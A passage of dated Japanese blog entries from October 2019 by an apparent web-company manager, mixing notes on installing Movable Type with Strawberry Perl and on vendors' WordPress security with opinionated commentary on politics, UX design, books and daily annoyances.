などと呼ばれて、クズみたいなプライバシー窃盗の新しい手法を大企業に売り渡すか、どうでもいいサービスをオンライン化したりクラウド化するなどという、インドやフランスの小学生でも思いつきそうなことを、大人が単に面倒がってしないというだけでやったていどのことが少しばかりの小銭としてあがっているだけだろう。要するに、年齢に関係なく、しょーもない算数やパソコンの操作ができるていどでイノベーションだの社会貢献だのと言っても、それは空回りというものである。どれほどプレゼンが上手かろうと、資金をたくさん集めようと、システム開発できようと、それだけで事業を起こしたり会社を経営できると思い込んでいる限りは、東大の博士号をもっていようとも掛け算や足し算の博士号にすぎず、経営者として無能である。

2019-10-02それはそうと、廃棄処分の対象にドローンがあるんだよねぇ。玩具じゃなくて、頑丈なアタッシェ・ケースに梱包された本格的なもので、制作部署に部署単位でインセンティブ・ボーナスという制度があったときに購入したらしい。でも、すぐに壊れたらしいし、使い道がないとのことで廃棄する。先ほど紹介したパソコン・ファームさんでも引き取りは難しいとのことだから、まぁ有料でどこかに引き取ってもらうしかないのだろう。

2019-10-02会社のテナント・ビルで使う共用のトイレや公衆トイレでも言えるが、とにかく便器の外に小便を撒き散らす奴がいるんだよね。自宅の便器なら、自分で拭くだろう。そもそも便器から飛び散ることを気にして、最近では小便だけでも便座に腰かけて用を足す人が増えているほどなのに、自宅のトイレではないからといって、あれほど無様に撒き散らして平気というのも困ったものだ。自分の息子が余所見してることに気づいていないのか。

2019-10-02Movable Type 5.2.11 を入れるのに、まず Perl は Strawberry Perl 5.30.0.1 を入れておいた。恐らくは Perl が新しすぎて何か問題が起きるだろうが、それはいい。次に、もちろん MT を展開したディレクトリにある CGI ファイルの shebang 行は、全て Strawberry Perl のパスに置換しなくてはいけない。"#!/usr/bin/perl" を "#!C:\Perl\bin\perl.exe" などに置換すると、48個のファイルを置換した。これで、Apache の CGI 設定と virtual host の設定を追加すればアクセスできる。次に、mt-check.cgi で必要なモジュールの一覧を表示して追加していくのだが、ひとまずは MySQL (MariaDB) への接続に必要なモジュールと、必須モジュールだけでいいだろう。すると、"LWP::UserAgent" だけが cpan コマンドで最新のものが入っているにも関わらず、エラーが出る。解説によると、正規表現のオプションが古かったり、MT に同梱されているモジュールの方が古いので(cpan コマンドで導入すると、それらは Perl のディレクトリに入るのだが、MT はインストールディレクトリの extlib フォルダにあるモジュールを優先して使おうとする)、まぁかなり荒っぽいがエラーを起こしている MT 配下のモジュールを削除してしまえばいい。これで、見つからなければ Perl のディレクトリにあるモジュールを使おうとするので、エラーはなくなる。その後は、対話式のインストールを進めて、データベースの設定とメールの SMTP サーバ(sendmail なんてないので、会社のメールサーバに SMTP 認証で接続する)を設定すれば、順調にインストールが完了した。

2019-10-02某大学のサイトでは、追加のコンテンツを Movable Type の上で作業するため、できればステージング・サーバでも開発環境を用意したいところだ。しかし、予算の規模からするとライセンスを9万円で購入するのは避けたい。はっきり言って大学や行政の案件というものは、それだけで事業者が会社として(個人としてならともかく)経営していくのは相当に無理がある安さなので、無駄な出費はしたくない。かといってステージングでの作業もなしにいきなり公開環境で作業するというのもどうかと思う(まぁ、出力先のファイル名を test.html などとして公開サーバでテストしてる会社も多いとは思うが)。そういうわけで、ひとまず OSS 版の Movable Type としては最終のバージョンである 5.2.11 をダウンロードした。ただ、これはいかにも古くてセキュリティ上の不安があるため、SAKURA インターネットのサーバではなく僕の業務マシンで運用する。

2019-10-0210月から広告代理店の大広さんが WEDO という会社を立ち上げて、ウェブなどのコンテンツ制作受注はこちらが担当するらしい。それにしても・・・このサイト、スクロールにコンテンツがちゃんと追随してない気がするよ。それに、社長さんのメッセージも署名がページの下に隠れてるのに、スクロール・ボタンの反応に敏感過ぎるのか、すぐにページ単位で動く(下に隠れてる社長さんの署名を見ようとしてゆっくりスクロールすると、次のコンテンツの先頭位置までスクロールした瞬間に次のコンテンツが問答無用で展開される)。すると、下に隠れてる社長さんの名前が今度は上部に流れて隠れてしまい、かなりイライラする。二度とアクセスしたくないサイトだ。SPA では、こういう紙芝居的なプレゼンテーションを UX のモデルにしてるサイトが増えてるけど、こういう UX 設計って紙のセンスしかない年寄りの発想としか思えないんだよね。ウェブのコンテンツに限らず、もともとページなんていう物理的な制約は書籍だろうとウェブページだろうと本質と何の関係もない。その写真や文章を 16:9 の画面内に収めるという、本質とは関係のない条件で見せることに神経を使うのは、まずもって無駄だし、マーケティングやエディトリアル・デザインの観点から言っても無意味だと言いたい。大広WEDO -DAIKO WEDO creative & development inc.-

2019-10-02そういや、大衆右翼を自称した笹川良一氏も、ハンセン病の制圧活動に携わって薬を無償で提供して回ったことがあると聞く。読売のナベツネも保守反動の権力者と言われるが、東大の哲学科を出ていて先の戦争には批判的だし、内閣の靖国神社参拝には昔から「戦犯に頭を下げるとは何事か」と反対している。こういう人々の言ったりやってることと、Twitter でクソみたいなたわごとをタイプしてるだけのゴロツキどもとを、同じように「保守」とか「右翼」と括ることには、やはり強い違和感がある。そろそろマスコミや研究者や出版関連の人々が率先して、「ネトウヨ」という言葉自体を放棄するべきではないか。

2019-10-02ハンセン病(らい菌の感染で発症し、「らい病」と言われていた時期もある)の啓発サイトで見つけた書籍情報のページだ。ハンセン病は90%以上の人が耐性をもっていて感染力も低いし、いまは薬で完治する。皮膚に目立った形状の斑紋が起きることがあるため、ほぼ見た目だけで忌避されたり、医学的知識や施術の不足によって隔離されるような差別を受けた人が世界中に数多くいる。日本で出版されたハンセン病に関する本を、比較的手に入りやすい最近のものから、いまでは希少となった古書まで、一覧できるようにしました。http://leprosy.jp/special/books/

2019-10-02ちょっとイデオロギー闘争の説明は面倒な内容だけど(高校時代には新左翼の分派が起きた経緯とかを幾つかの本で読んだのだが、コミンテルンとか共産党の歴史にはもう殆ど興味がない)、今日の朝に寝床で『水平記』(高山文彦、新潮社)の上巻を読了したところだ。Google で検索しても上位の5件ていどに書籍の情報があって、1件は『水平記』で描かれた松本治一郎のウィキペディアのページがヒットしているが、すぐに無関係な「水平器」(液体に小さな気泡が入っていて、水平かどうかを計る器具)のページが続々と続く。アマゾンでも、もともとの単行本どころか2007年に出た新潮文庫すら品切れになっているのは奇妙だ。品切れになっているほど売れた本なら、岩波書店とは違って新潮社であれば数千部の重版くらいできるだろう。ともかく、唾をつけただけの浅薄な読書体験をせっせとブログ記事として投稿する人々が殆ど記事として投稿していないように見受けるのは、やはり部落差別にかかわる本だからなのか。あるいは Google の検索結果に何らかのバイアスがかかっていて、他の語句と組み合わせたら大量に見つかるのかと思ったが、「"水平記" 高山 部落差別」のように strict keyword 検索を使っても、商品情報のページがヒットしやすくなるくらいで、さほど参考になるページは見当たらない。

2019-10-02それにしても、うちのサービスってどれも基本的に他社のコピーで、どこかのゲーム会社の社長が臆面もなく豪語したようにパクリでも食っていけみたいなノリなんだけど、それでも事業としてそれなりの収益を上げつつある。ということは、既存の上位企業が同じようなサービスとサイトを運営しているにも関わらず、コピーもシェアを得ているのだから、要するに上位企業の営業活動やパブリシティが不足しているということなのだろう。もちろん、後追いでもなんでも、そういう事実があれば更に食い込む余地はある。で、上位企業は既に上場してる会社で、技術的なプレゼンスとかにも力を入れてるわけだけど、はっきり言ってバックエンドの技術なんてどうでもいいんだよね。実際のところ。そのサービス・サイトが Rust で実装されていようと Perl で実装されていようと、そんなもんパフォーマンスが同じなら利用するお客さんには関係のない話だし、Ruby だ Go だと言ってても個人情報の漏洩事故が起きたらクソはクソだ。

2019-10-02当社は廃棄するパソコンや液晶モニターの回収を、この「パソコンファーム」さんにお願いしている。もちろん、回収してもらう前に業務データを消去(OS ごと HDD 全体を消去)しているし、この手の業者さんが HDD を解析してデータを抜き出し転売するなんて面倒なことをするとは思えないので、さほど心配はない。それに、廃棄する時点で知財としても業界情報としても既に公知となってるものだ。既に当社ではローカルに保存しないで Dropbox のファイルを一時的に編集して戻したり、あるいはオンラインで編集できるものはブラウザ上で完結するようにしている。https://pc-farm.co.jp/

2019-10-02まぁ、ルールを適用すればそうなるのは当然で、子供にもそういう世の中の(ルールは単純だが適用事例の区別は面倒な)仕組みがあるということを教える、良い機会ではないの。何をそんなに文句を言う必要があるのか。それとも、マスコミというのは、そんなに世の中を単純にしたいのかね。海外とは違って大半が学部卒の素人にすぎない日本の記者やライターでも仕事がやりやすいように。プロ野球選手カード付きの「プロ野球チップス」(オープン価格、カルビー)とシール入りの「ビックリマンチョコ」(オープン価格、ロッテ)。いずれも人気の根強いおまけ付き菓子だが、税率は前者が10%に対し後者は8%と異なる。違いは、おまけが価格に占める割合だ。子供の懐を直撃か 消費税増税で揺れる「駄菓子」 

2019-10-02国内には茨城と長崎の二か所にある入国者収容所入国管理センターの非人道的な対応がたびたび話題となっている。もちろん、なんらかの理由で入管法に違反した自称難民とか犯罪者を収容する施設ではあるものの、最低限の生存や生活の保障はするべきである。本人が拒んでいたという事情はあるにしても、なんでそういうことをするのかと対話したり説得する手立てはなかったのか。大村入国管理センター(長崎県)で今年6月、収容中の40代のナイジェリア人男性が死亡した問題で、法務省出入国在留管理庁は1日、食事や治療を拒否したことによる「飢餓死」だったとする調査結果を公表した。男性は一時的に外に出られる「仮放免」などを求めて「ハンガーストライキ」をしており、センター側がハンストを把握してから死亡までの3週間で約13キロも体重が減っていた。入管施設での外国人死亡は餓死 入管庁「対応問題なし」(朝日新聞デジタル) - Yahoo!ニュース

2019-10-02よく、これまでのお笑いというのは権力批判だったのに、最近のお笑いはただのヘイトになってるとか言うんだけど、それは違うと思う。リアリズムとして言えば、お笑いどころか芸能人はそもそも社会システムの制御可能な出力先として生存したり芸能活動してるだけの《媒体》の一つなのだから、外部条件が変わればお笑いの制御機構だって変わるのだ。吉本の芸人を非難するのは好きにすればいいが、官公庁案件から吉本興業を締めだしたところで表面的な対処、つまりはモグラ叩きをやっているだけだ。伝統芸能だろうとスポーツだろうと、およそ大衆文化の娯楽というものが世相や法律によって制御しうる範囲のものである以上は、それらを根本的にどう作っていくかというところで解決しなければ、今度はヘイト歌舞伎やヘイトアイドルやヘイト彫刻が出てくるだろう。BuzzFeed Japan News @BFJNews / 「猿とエッチしたらエイズになるわ」「黒人とかな」 吉本芸人「金属バット」のネタ動画に対し、HIV陽性者の団体や支援団体から「ショックというより呆れた」「差別や誤解を強化するのはやめて」などと批判の声があがっています。https://twitter.com/BFJNews/status/1178976601016545281

2019-10-01いよいよ実弾の発砲という事態になったようだ。ビデオを観ると分かるように、警察官が数十センチの至近距離で胸を撃っている。緊急避難的な行動とは言え、そもそも相手に拳銃を向けていた時点で予想のついた結果でもある。Demosistō 香港眾志 @demosisto / A video shows that the police officer shot a live bullet in the protester's chest at point-blank range! #HKPoliceTerrorist intended to kill!https://twitter.com/demosisto/status/1178966967954227203

2019-10-01殆どの事例がウェブコンテンツの制作という条件付きだが、これまでに PM だのウェブ・ディレクターだのという人々と接してきて、やはり人望がない人物には何らかの共通点があるようだ。20年くらいのあいだに自社で出入りしてきた人々から取引先の人々までを含めて200人くらいを見てきた経験から言わせてもらえば、もっとも目立つ共通点は、相手に建前しか言わないということだ。どんなことでも「お客様のため」とか、反論しにくい建前を言っていれば人が動くと思ってるディレクターというのは、どれほどポーターがどうの財務がどうのと薄っぺらい読書情報を並べ立てて「ロジカル」な議論がうまくできようと、人の信頼は得られない。そして、二つ目の共通点は、自分がやったことを相手もできるとかすべきと言う人だ。私は電通案件で2か月ほど自宅に帰ってないから、あんたたちも1か月くらい会社で寝泊まりできる筈だとかすべきと平気で言ってのける。それは、僕のように残業は無能の自己証明だとしか思ってない部長職から言わせてもらえば、お前が単に暇な人生を送ってるだけの話だ。仕事しか人生の目的がなくてもいい。そういう人がいてもいいが、自分で思い込んでいるよりも多くの人にとっては、仕事など単に生活費を得る手段だ。そして、アメリカのような自由主義の社会どころか日本のような(括弧つきだが)社会主義の社会ですら、労働者がそう考えることを非難する正当な理屈など存在しない。そして、これは重要なことだが、建前や熱意だけで仕事をしているからといって有能だとは限らないし、良い結果が出せるものでもないのだ。

2019-10-01三井住友では「クロッカス支店」(クラウドサインの利用料金の支払い先とか)なんて支店名が使われている。ペパボの料金振込先として「あじさい支店」というのを初めて見たときは、こんな地名があるのかと思ったが気にしなかった。でも、さすがにクロッカスはないだろうと思って調べてみると、なるほどオンラインの専用口座というわけか。ちなみに、「わたしの支店」なんて支店名の銀行があるようだが、au の「じぶん銀行」と同じく日本語話者としての見識に欠ける愚かな名称だと思う。ネット銀行の支店名が気になる

2019-10-01僕が採用している、WordPress を管理用にだけ実装して、フロント・エンド用には別のフレームワークでサイトを構築し、WordPress のデータベースからコンテンツを読み込むという分離方式は、事情をよく知らない外部のベンダーとか制作会社にサイトの運用が移ると、再び WordPress を公開用の CMS に使うという仕様に戻ってしまうことが多い。それだけならいいのだが、公開側にも使うなら WordPress のセキュリティ対策を強化してくれと言っても、多くのウェブ制作会社は「どういうプラグインを使ったらいいか教えてほしい」と言ってくるんだよね、いまどき。僕が「WordPress のセキュリティ対策」というコンテンツを MarkupDancing で初めて公開したのは2015年だが、それ以前にも WordPress のセキュリティ対策を色々と議論している人は(もちろん徳丸さんを始めとして)いたし、それどころか僕自身が2009年と言えば10年前に関西で初めて懇親会として開催された WordCamp で、nao さんと「一般向けの本でもセキュリティについて書いた方がいいけど、難しいねぇ」と話していたくらいだ。それを、いまだに WordPress について基本的なセキュリティ対策や、多くのユーザが使っているセキュリティ用のプラグインを教えてくれという制作会社がある。もちろん、責任分界から言って教える道理はないが、教えずに馬鹿げた対策をされても困る。そもそも、ヘテムルの WAF が働いてフォームを使えないから WAF を切ってくれというのだから、最初から素性が知れているというものだ。それにしても、制作部門や自社サービス部門の連中って、この手の会社をどうやって選定してくるんだろうか。もちろん、与信もクソも関係なく先に発注してから申請してくるので、こっちは拒否しようがないという場合が多い。これで上場するというのだから、恐れ入る。これは役職者としての個人的な感想だが、コンプライアンスやコーポレート・ガバナンス・コードの観点から言えばリスク要因は是正する必要があろう(もう、このレベルになると「理解してもらう」とかサーバント・リーダシップとか、そんな下手にやってる余裕などないだろう)。

2019-10-01Google Groups では、既に運用が止まっている感のあるメーリング・リストだ。データとして残っているならオンラインでも検索は楽かもしれないが、せめて全ての投稿をテキスト・ファイルとしてダウンロードできないものか。プライバシ保護データ利用技術 (Privacy Preserving Data Utilization Technology)https://groups.google.com/forum/#!forum/ppdu

2019-10-01腕が疲れる原因として、勤務中に起きる色々なことが積み重なっているのだろうとは思う。たとえばマウスの高さとか、椅子の高さとか、そういったものは調整しつつ過ごしている。その他にも、ブラウザを使っていて困惑するのは、ここ最近の傾向として mobile first なページらしきサイトでは、ページの先頭に戻るボタンがないという事例が増えてきているように思う。こういうページで、スクロール・ボタンを延々と使って戻るのは、実はかなり腕に負担がかかるのである。そもそも、スクロール・ボタンはスクロールだけでなく、たいていミドル・ボタンとしての機能もあるため、これを使うときは人差し指を常に一定だけ浮かせて使わないと間違ってミドル・ボタンとして押してしまう。この負担は、意外と大きい。なので、僕はマウスの設定でミドル・ボタンとしての機能を削除している(一つのボタンを使っていてスクロールしてしまうこともあるなんてリスクが前提の UI は良くないと思う)。また、そもそもスクロール・ボタンでページを戻るという操作そのものがイライラする元だ。試しにやってみたらいいと思うが、指を手前に弾くのと前方へ弾くのとでは、どちらがやりやすいか。これは指の筋肉や骨格といった構造から言っても自明だ。何かを握って握力を計ることはできるが、指を外に押し出す力を計測する人などいない。よって、そういう不自然な指の動きを強制するような UI はクズであり、クズの仕様ごときに対応してやる道理などないのだ。サイド・ボタンがあるマウスなら、それに page up の機能を割り当てるのがよいだろう。

2019-10-01別にユーザ本人が簡単に修理できる必要はないと思うのだけど、とにかく最近の「製品」は壊れやすいし、中のソフトウェアの問題もあって実効的に使える年数が短い。使い捨て以外のエコシステムで製品の開発サイクルや予算も確保できるような仕組みはないものだろうか。EU brings in

2019-10-01Azure つまりはクラウド・サービスをプラットフォームとした "virtual desktop" サービスというものらしい。僕らのように互換シェルを使ってきた人々は "virtual desktop" と言うと複数のデスクトップを切り替える「仮想デスクトップ」という機能のことであったし、いまでは Windows 10 で標準機能となっているため、多くの人が互換シェルを使わずに利用している機能だろう。では、どうして同じような名前のサービスを始めたのか。名前として混乱しないのか。実は、英語では混乱しない。なぜなら、Windows 10 で提供している「仮想デスクトップ」は、英語では "task view" と言っているからだ。本来、Windows 10 のタスクバーを右クリックすれば分かるように、日本語でも正式には「タスクビュー」と呼ぶのだが、なぜか「仮想デスクトップ」と言ってるメディアがある。混乱するとすれば、寧ろ "virtual desktop" も「仮想デスクトップ」と訳さざるをえない日本語だ。それはそうと、この手の think clients のようなアイデアは昔からあるのだけれど、中小企業では殆ど普及しない。そもそも、社内のマシンと出先のマシンを使い分ける人がどれほどいるのかという問題もあるし(使い分けるからこそ、こういうサービスを使って常に同じ環境が使えることがメリットとなるのだろう)、使い分けていたところで環境を正確に同期させるニーズがどれほどあるのかという問題もあろう。実際には、環境を正確に同期しないといけないような仕事をしている人は、きわめて限られていると思う。いまや営業なんてブラウザさえ使えたら殆どの仕事はブラウザ上で終わるわけだし、デスクトップ環境なんてディフォールトならどっちみちこういうサービスを使わなくても同じだ。https://azure.microsoft.com/en-us/services/virtual-desktop/

2019-10-01ストールマンへの援護射撃だが、困ったことに彼を非難してる人の多くは FSF だの「フリーソフトウェアの思想」には興味がない。もちろん、emacs なんてのは《ややこしいだけのメモ帳》だと思っているだろう。でも、そういう人々の判断を軽視はできないのが現代の(小文字も含めた)政治というものだ。https://medium.com/@whoisylvia/richard-stallman-has-been-vilified-by-those-who-dont-know-him-a3907b25b4c7

2019-10-01Coliss でも翻訳されているらしい、いわゆるメタタグの自称解説ページ(しかも、御大層に "free" と名乗っておられる)なのだが・・・Hacker News を見るまでもなく、全くダメだと思う。そもそも個々の要素についてロクな解説がないし(タグの上に用途をコメントとして書いてるだけで、こんなのは cheatsheet だろう)、推奨する最小限のメタタグなるものについても、根拠が何もない。文法あるいはセマンティクスの観点からそれが最小限だというだけのことでしかなく、プロ(あるいはプロを目指す人)がそんなお遊びの結果を参考にする必要など一つもないだろう。https://news.ycombinator.com/item?id=21119553

2019-10-01中国の建国70周年記念のパレードでは、ドローンの爆撃機も行進に加わっている。無人で目標を爆撃する方法として、既に各地で実戦投入されており、是非を論じる段階は過ぎ去ってしまった。とりわけ、対人兵器として運用されることになると、これまでの多くのアニメや漫画や小説で描かれたようなグロテスクさを感じないわけにはいかない。ただ、古来より戦争になると軍人も民間人も区別なく殺されていた事例はたくさんある。そもそも昔は職業軍人と民間人の区別などなかったから、占領した土地の住人が武器を手にして襲ってこないとも限らなかったので、いったん占領した土地の住人を皆殺しにするような措置はリスク管理として妥当だったのである。また近代の戦争においても、或る施設を破壊するという目的で爆撃したり艦砲射撃する場合、もちろん精度の影響もあるが、周囲の住民にどういう影響があるかを考慮していては十分な効果がないため、目標とする施設を中心とする一定の範囲を攻撃対象とするのは戦術として妥当だったのだろう。当然、現代の技術や法律といった知識から言えば、それらの「妥当性」にいくらでも異議は差し挟める。しかし、戦争が起きたら、現代であっても軍事施設の周囲に住む民間人のことなど無視して作戦は立てられるし遂行されるだろう。それを後で咎められようと、負けたら意味がないからだ。戦争とはそういうものだと思っておいた方がいい。悪意がなくても、軍隊とはそういう思考をして決断をして行動をするものである。

2019-10-01雑に、概念は客観的で観念は主観的だと言われたりする。概念はつまるところプラトン的なイデアの世界の住人(われながらこんなバカな喩え話をするのも気が引ける。なぜなら、この喩え話は哲学を学んだ人しか分からないにも関わらず、哲学のプロパーがこんな単純な喩え話を認めるとは思えないからだ)であり、観念はつまるところ各人の思うところであるから、どうやってこれら両者が対応する(べきな)のかは大きな問題なのだという。もちろん、こういう set-up そのものが予断の多い説明であり、現代ではとても看過しえない杜撰な説明であることも事実だろう。そして、或る何かが概念であると誰の主観で理解したり認知するのかとか、或ることを観念として思考するという認知プロセスの客観性を説明する可能性についてはどうかと考えてみれば、こうした概念や観念にまつわる理解や定式化が一種の循環に陥ると指摘することも容易い。もちろん、だからといって、認知能力というスキームから出発すれば両方を循環なく説明できるという発想も、それが概念に訴えていたり、目標や判断の基準について主観的な要素があれば、結局は同じ循環に陥る。現代の哲学が、一方では言語について、他方では意識について、こういう循環に陥る可能性をどうにかして抜け出そうとしてきたのは分かるのだが、僕はやはり哲学するということは、かような循環つまりは無根拠であることを受け入れる(とはいえ、一部のポモのように正当化したり開き直るということでもないし、「投企」と言ってのけたら済むわけでもないと思う)ことにしか意義はないと思う。

2019-10-01厳密には、「概念」とか「観念」と呼ばれている語句が哲学や他の分野、あるいは世俗で使われる雑な意味合いでもいいが、ともかく使われるようになったのかは、プラグマティズムの問題としても(ここでは「語用論」という意味)正確には分からない。もちろん、言葉として共通に(もちろん何が《共通》なのかは問われていい)使われるよりも先に、それこそ《実質的には概念として》働いてきた何らかの意味合いなり conception があったのだろうとは推測できるが、それの成立した時期はさらに客観的な推定など無理があろう。したがって、これらの言葉がどういう経緯で使われてきたかということだけで、それらが意味している認知活動も同じ経緯がたどってきたと言えるかどうかは疑問があるし、ましてやこれは言語によって経緯が異なるため、それこそ概念として議論することは語源学を援用する考古学のようなものとなる。対して、ヒトとしての認知という観点から概念や観念を合理的再構成として定式化することもできるが、やはりそれらについても両方のアプローチが必要だと思う。仮に合理的再構成の定式化が《正しい》としても、過去の哲学者がそう理解してものを書かなかったからといって、古典を読みかえるわけにはいかないからだ。

2019-10-01"International Journal of Information Security Science" なんていう generic な誌名になってるけど、editorial board を確認すると全てトルコの大学の人(教授職の人物かどうかすら不明の人もいる)のようだ。イベント情報もトルコのものだし、これは "International" という高邁な志はともかくとして、やはり現実には "Turkish" という言葉を使うべきだろう。ていうか、これだと board メンバーが実在するかとか、本人が本当に board メンバーになってるのかどうかも分からないので、実質は「プレデター」と同じ扱いになる。http://www.ijiss.org/ijiss/index.php/ijiss/index

2019-10-01お名前.com のメールというのは、同じグループのムームードメインと比べても非常にしつこい。管理画面にドメインの廃棄や失効(つまりは更新しないということ)を意思表示する機能がないおかげで放置していると、「ドメイン契約更新 振込先口座のご案内」とか更新の期限が近いことを知らせるメールが、それこそ毎日どころか半日おきくらいで流れてくる。そもそも、ユーザが更新を失念していたときに GMO から通知することを「怠った」という理由で、何かの損害賠償のケースが一度でも起きたのだろうか。

2019-10-01PHILSCI.INFO で掲載している PSSJ と PHSC の最終更新日の表示は、コードに間違いがあったため修正した。いま表示している日時は、後で手動更新したものなので、日付は最新だと思う。時刻は適当に書いただけなので、デタラメだ。具体的に何が間違っていたかというと、file_get_contents() の対象が URL の変数ではなく、ハッシュ値の出力ファイル名の変数になってしまっていたので、常に同じ値が返ってしまう(よって更新されない)という問題があった。

2019-10-01全国放送の NHK ニューズ番組というのは、昔からなんだかんだ言っても東京を中心に報道内容が決まっている。今朝も、アーバンライフとやらに疲れた意識高い系の田舎者どもに打ってつけの癒しツールとして、植物を振動させた上に人の目で関知できない間隔で明滅する光を当てて、草花がコマ送りのように見える額縁を紹介していた・・・これは、はっきり言って植物に対する明白な虐待である。括弧に入れていないのは、literally true だからであり、比喩でもなんでもないからだ(相手に人権のような作り事を設定しているかどうかにかかわらず「虐待」という概念は成立する)。こういう事例も、東アジアの辺境地帯で暮らす気取った田舎成金どもの「スローライフ」だの「ロハス」だの「アーバンライフ」だのが、いかに欺瞞的なものであるかを示す格好の事例だろう。検索さえすれば誰でも分かることだが、植物が葉っぱどうしの共振によってコミュニケーションを取っているという研究結果が知られていて、最近は植物も高度な生活を送っているといった本が続々と出版されている。要するに、こんな商品は植物の生体反応を無用に攪乱しているだけなのだ。そもそも、この程度の事実であればもっと昔から知られていたわけで、デザイナーだからといって自分が扱う素材の科学的な知識がなくてもいいという言い訳は通用しない(昔から、一流の芸術家は当時のテクノロジーにも通じていた。デザイナーが科学音痴や反科学の典型みたいに想像されやすくなったのは、単なる無知による偏見であり、そういう無能や三流だけがデザイナーや芸術家だと思っている人々の誤解である)。まるで魔法のアイテム。額縁に入れると、なぜか“ゆったり”動き出すオブジェ「Slow Dance」が上陸 - FNN.jpプライムオンライン

2019-10-01京阪の中之島線は本日から天満橋と渡辺橋の区間が220円になっていた。ただ、210円の区間が残っているため、恐らく間違って210円のまま切符を買ったと思われる人が、改札で続々とエラーで引っかかっていた。

冒頭に戻る


※ 以下の SNS 共有ボタンは JavaScript を使っておらず、ボタンを押すまでは SNS サイトと全く通信しません。

Twitter Facebook